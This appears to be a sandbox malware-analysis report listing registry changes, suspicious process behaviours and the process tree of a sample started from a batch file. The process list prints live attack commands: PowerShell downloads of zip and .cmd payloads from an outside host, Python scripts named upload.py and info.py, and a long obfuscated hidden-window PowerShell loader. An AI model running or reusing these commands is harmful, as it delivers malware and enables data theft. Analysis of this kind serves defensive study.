Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 60b61ce53fadda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0c9421e53fadda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 512 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 512 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 512 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4332 wrote to memory of 832 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 512 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 512 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Downloads\Python\Python312\python.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Downloads\Python\Python312\python.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 4580 wrote to memory of 5072 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe time.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe kam.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe update.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe upload.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe info.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/update.cmd' -OutFile 'C:\Users\Admin\Downloads\update.cmd' }"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Helvetica='Sub';$Helvetica+='strin';$Finn81 = 1;$Helvetica+='g';Function Enkeltvis($Fuldstndigheden){$Outgrin=$Fuldstndigheden.Length-$Finn81;For($Hegnstraad=5;$Hegnstraad -lt $Outgrin;$Hegnstraad+=6){$Merkonomernes+=$Fuldstndigheden.$Helvetica.Invoke( $Hegnstraad, $Finn81);}$Merkonomernes;}function Surfeiting($Retsinstituts){ .($Mindevrdig105) ($Retsinstituts);}$Unadduced=Enkeltvis ' .ateMbekrioMitzvzSelekiLnmodlKongel .assa,igar/Spher5 Inhe.Tigge0 ishe Tal,u(Sou hWN nsuiSu.stnresyndcatacoUptilwTarmks Dame Ind,aN FremTAvia, P ula1.enai0aliza.S aer0R,vio; blin AppeaWFor.uimil,snSty,o6Appul4Trimp;Len,m Proc.x inau6 Over4Nyans;Creod KinemrAnurivTreef: Rig.1Poeti2 Epiz1Woman.Scolo0 D ga) ,til B.rseG kilseRadiacTorvekVaernoFiske/Bldgr2Fe.lb0U,spo1 Brkr0,ateg0Oprrs1 Fler0Eno,a1 Klar De,iaFLophoiPlurarsneezeNedstfPolypoSeriex Domk/ nsul1 Afvn2Eamon1Bese..Homo,0coc,a ';$Naturtalent=Enkeltvis 'WilliU T,knsKje eeResenrOverd-Stat.A Sc ugSo omeUropanBaandtO ers ';$Blokbeskyttelsen=Enkeltvis 'F,annhBrepitElliptPrerepSupersAlien:Frabe/ ispe/Rili.wLam,awDucklwSwann.CoendsPantoe Fi,sn FlakdPalmes pacep,lodtaKernicDesceeZithe.Tvangc P.otoSpinemModes/Un elpgnotorTermooMaudl/ Umbed tasl.enpe/Water0Lingeu BladoArtisjka.itxUnjub0B.pre ';$Faggy=Enkeltvis ' enne>Brems ';$Mindevrdig105=Enkeltvis 'S.mafiAmmo,eInterxmefis ';$Imparsonee='Fugio';$stedsbiords = Enkeltvis 'AfridePla,tcDyndshSubsto nneu Op at%F rbrasyltepPlanop ForpdidoloaNektotNyligaLgdom%Fleur\VurdeCEshjboIsta,rDay odAperiifri,ea temu.TatovGUdvika S inrLmmel ro h&Defro&Limit Pre.eOmladcCreodhWi raoBandb FnokstMasse ';Surfeiting (Enkeltvis 'Foreg$GrippgRedellNigg o DesebPeroxa SniglNonde: ikriRlimmoeFun.mlXanthiUdk leWild vTittie Pones Indv2Yea,l2Noege4 Subm=repro(Fo.ebcCon,umbrutad ioxi Invad/IndhacIndre L.bsk$Ddel,sKoshetLabioeModstd AlpesNonrebFrdigiPlaneo Ovulr X,rad.amles Unfo) Tarm ');Surfeiting (Enkeltvis 'Count$Pegm,gdistrlFugt,oAnalob S.araAsseml Myo : AnalFFadseeThrashDishoa AcquaDyrefrCystoeSpirinMod.teStigmsSnobb=Stran$AvisuBKiltil ClicoAsocikPli tb Gaste.ommeslhegnkHearsyFluortRaag,t emie TanklVldigs leareF.edbnMonol.Kances erispbehvel .oreibutiktSolsp(d.cty$LangtFEmblaaPjaskgjob egB.twayknk,e),elvs ');$Blokbeskyttelsen=$Fehaarenes[0];$Racerbiler= (Enkeltvis ' Dys,$Kons g Nonelte,rao S,atbNoncoaLyretlTypef:AconuHA omaeDomingSlagin overs,ynantlivsarRaj,gaContaaKa,otdPoly eSpe.inAnpri=EstasNS receConstw Rott- Ut,tODas.ebAbekaj N deeEuryacFrafatFissi ,heraS NonvyUoplssQuay.tSlumse PepomMi jo.StatiN,arveeop.retDisso.,athoWUnd.ie S,gubIdmmeC indelOmstniGenuseAd.ctnCoalit');$Racerbiler+=$Relieves224[1];Surfeiting ($Racerbiler);Surfeiting (Enkeltvis ' Fdev$r sibHtriteePat.ogLa,drnSporosAdusttChronrAnnexaUnitaavandadMine eSkibsnOverh.AstraH Ultre PistaSvirrdBer ne tatr CarbsBeh,v[ .opi$NonprNMangeaCerebt PsycuDiscorOutbrtPrejuaTarmplKyphoePaadrnParr tCorre]Elmas=Reole$Di.fuURownen RostaEx redReba,dSkrmsuRemiscIntereBil.edSprng ');$Cartogrammes=Enkeltvis ' Drou$PlkkeHStatieSpurrgGrusvnDiplosButtettaagerDevotaStrenaPaperd.resseandennCross.UndivD monooImpliw.raekn.anonlInfaloMultia LegadSy crFFr,vriUnsellBambue Reac(Embed$DreadBSkolilChuppoA,bjnkSpannbMet,le RabasSnivekZ.druyBellat HooktinveceNoninlgaj gsUnderePre cnLease,Colle$ UndeFFuldas Ho.ntfors,nBejleeBaandsSdsup)Beski ';$Fstnes=$Relieves224[0];Surfeiting (Enkeltvis ' F.tn$Pr ntgBilanl latho C,asb.olstaChuntlTachy:CubanAErhveuLdrepkUnno,tAfskriCasemo.orman MonssT ansh MoraaKillilModst=Combu(KlageTFornjemakulsT.mmet Homi-Volu PFrdigaPr,bltEtre h Chec Stvn.$ThyreFNonrespr vitNippynHet reRig rsUnder)Toyfe ');while (!$Auktionshal) {Surfeiting (Enkeltvis ' Bere$OxyhegElverlAhrimoSkraabTilbaaGenarlKlein:SquidGChaffeVkstbnAd,nifs.ndroForsvrPeptitMonkslOkkerl korei a,mrnOddmeg E keeAntirn Unbrsnu,se=sjlev$salt,tIndl.r Nonpu ungdeR.akt ') ;Surfeiting $Cartogrammes;Surfeiting (Enkeltvis 'SjldeSRuefutSengeaGgesnrUnwortRock.- revSudfoelFerreeS,mmeeJulekpBizar .nti4Polit ');Surfeiting (Enkeltvis 'B,mbo$ ighpg.aiselB.ttoo Opskb Ch,raGalgelUnma.:Jade,AUngouuDengskKaim tR,alliP.nsio ulfanBrikesExp,ihTourna rklalAflgg=Hoard(Dr,ftT ObedeSmaassSkjo tUdste-PtomaP Exenaprivat.ostuhsubr, Casp.$ TaruFTrivssb waitExecun.ntiseHogwasB,gge)g lop ') ;Surfeiting (Enkeltvis 'Docks$SulkiglivfulStokvoC.rrob TangaF.senl Niev:v sumHFersiacarcilM thovEftertTur,eaMagesnDa.kogS bspeB rbenPosektNonameSonnerArchd=Heste$ProtegJ.nvilErnrioHesitbJems,a.avonl Nonp:roicgN Unlods uder D ageDjrven UfoedEks.reTuris+Ralli+Bu.ca%Stb.u$LavstF asbreNongrh s abaExempaNachtr,aricefixivn ,unseSnrklsEmpir.Cartec PhleoM rstuUrinanCl gwtGomph ') ;$Blokbeskyttelsen=$Fehaarenes[$Halvtangenter];}$Isopleura=307994;$Exciton=29049;Surfeiting (Enkeltvis 'capri$m gicgRoanplSlagtoUdstybEt,gra.illelUnsto:rekonHg ngseSpu vdBadevnudsttiAvlsfnRestlg Nau,eA.thrr ,hgrnFogedeHent. Fire=Tidsp P.eemG U,deeSt.tstKllin-Stjf.COutbao mparnUop.ytBest,eHemianmortitTi,la Stand$PorraFLoph.sf.rdyt,pecinTelefeBasilsFl dg ');Surfeiting (Enkeltvis 'Silan$Leg,mgSkovllTit,loHvinebJudaha HeadlBl.ds:,acheSA,sioaMennelRecoogAlg fb U dla.naugrSkovseUnwherB skeeLoofisCompr ykel= Gune Forh.[ U,veS.uadryDre.esUnpubtBiokee R,sem,akni.WrongC arbooTurbinGesjfvuncule andrManagtHypov]Konst:Codev: MammFSadder.ngago Def.m Pu,sBBarfoaEksprsPe.eteBe ha6Skurk4KuijpSCommutAyinpr RestiTransnGemligForud(Magaz$Tffe,HKni,kesnowsd DagtnCherripolyunabwabg enhaeAntr,rKafeenFlyveeSplin)lo de ');Surfeiting (Enkeltvis 'Clada$PreingMajlilHarrooApropbgjorda Ov,rlJ.sco: ThruBOprrsyAlpingMas egPrvekeUn rerEgepaeBlotcnMicrotAcan,eSupernGawke Acnid=Devon Aaste[unscaSUds,rySmarasYnkvrtprod eHie omarbej.EkspeT ShmeeUndewxF,ldetFies..CheniE SpednSterncRacegoHonord KlniiRationVerbogSuppl]Pla,s:Arter:misdiA InteS TenoCF,rsnIO ienINarro.Vati,GLandveIsa.etHabitSSneg,t Secrr Af ai Sen,nSideggEfter( Fors$RestiSCerataSocialOgeesgHyperbHvepsaSarrar.etere PostrHa.loeB,llisFaeca)Frugt ');Surfeiting (Enkeltvis 'Autop$s aragTimefl EsthoStvk.b,heomaMaddelInstr:KljesITork.nSiametSkispePylorrFif,eaSubtocEcd stRettniSupero SearnAngreiFi.trs Trfom Cali= Flad$ Bil.BMyselyStri.g Autog ZaraeAn,iar Va.deregnsn Ku rtAfsejeSp dsnBugta.Hungeso.ernuMargibPtelesCapstt Pa,prHoke i Afbon FormgR val(Fortr$proteInoninsL.terovice pSolidl MudreRjseruT.aner.accuaTerra,Keelh$Am laEFanatx Sme.cFritaiBry,gtsodeaoUdm,gnPre,r)d,por ');Surfeiting $Interactionism;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cordia.Gar && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

